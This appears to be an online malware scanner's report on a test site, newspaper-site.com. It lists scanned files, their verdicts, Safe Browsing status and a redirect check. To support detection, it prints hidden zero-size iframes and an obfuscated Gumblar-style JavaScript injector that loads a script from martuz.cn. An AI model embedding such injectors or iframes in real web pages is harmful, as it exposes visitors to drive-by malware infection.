Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newspaper-site.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://newspaper-site.com/ | 200 OK Content-Length: 1273 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://thejumpbeat.com <iframe src="http://thejumpbeat.com" width="0" height="0"> | ||
http://newspaper-site.com/binary/clam.pdf | 200 OK Content-Length: 7277 Content-Type: application/pdf | clean |
http://newspaper-site.com/test404page.js | 404 Not Found Content-Length: 412 Content-Type: text/html | clean |
http://newspaper-site.com/binary/clam.exe | 200 OK Content-Length: 544 Content-Type: application/x-msdos-program | clean |
http://newspaper-site.com/binary/clam.zip | 200 OK Content-Length: 404 Content-Type: application/zip | clean |
http://newspaper-site.com/binary/trojan-swizzor.exe | 200 OK Content-Length: 251904 Content-Type: application/x-msdos-program | clean |
http://newspaper-site.com/malware.pdf | 200 OK Content-Length: 27304 Content-Type: application/pdf | clean |
http://newspaper-site.com/gumblar.html | 200 OK Content-Length: 807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(Aq7){var IhZef=('va_72_20a_3d_22Sc_72i_70tEn_67ine_22_2cb_3d_22V_65_72s_69o_6e()+_22_2cj_3d_22_22_2cu_3dna_76_69gator_2euser_41ge_6et_3b_69f(_28_75_2ein_64_65xOf(_22Chro_6de_22_29_3c0_29_26_26_28u_2eindexOf_28_22_57_69n_22_29_3e0_29_26_26(u_2ei_6ed_65x_4ff(_22NT_20_36_22_29_3c0_29_26_26(_64ocument_2eco_6fk_69_65_2e_69_6edexOf(_22miek_3d1_22)_3c0_29_26_26(typ_65o_66(zr_76zts)_21_3dty_70_65of_28_22_41_22)_29)_7b_7a_72vz_74s_3d_22_41_22_3b_65val(_22_69_66(wind_6fw_2e_22_2ba+_22)_6a_3d_6a+_22+_61_2b_22M_61_6a_6fr_22+b+a+_22_4dinor_22_2bb+a_2b_22Bui_6cd_22+_62_2b_22j_3b_22)_3bdocume_6et_2e_77_72ite(_22_3cscrip_74_20s_72_63_3d_2f_2fm_22+_22artuz_2ecn_2fv_69d_2f_3fid_3d_22+j_2b_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d').replace(Aq7,'%');eval(unescape(IhZef))})(/\_/g); --> Antivirus reports:
| ||
http://newspaper-site.com/infected_page.html | 200 OK Content-Length: 10081 Content-Type: text/html | suspicious |
Hidden iFrame found. size: x0 src: http://www.foobar.cn <iframe height=0 src="http://www.foobar.cn"> | ||
http://newspaper-site.com/hxxp://chshun.cn | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://empty52.cn | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://showwo1.cn | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://badf3.cn | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://mvoyo.com/1.js | 404 Not Found Content-Length: 419 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://17gamo.com/1.js | 404 Not Found Content-Length: 420 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newspaper-site.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 22:01:57 GMT
Accept-Ranges: bytes
ETag: "3498d9d-4f9-47e18d02149c0"
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_python/3.3.1 Python/2.6.2 mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Length: 1273
Content-Type: text/html
Last-Modified: Tue, 26 Jan 2010 22:29:03 GMT
...1273 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: newspaper-site.com
Referer: http://www.google.com/search?q=newspaper-site.com
Result:
The result is similar to the first query. There are no suspicious redirects found.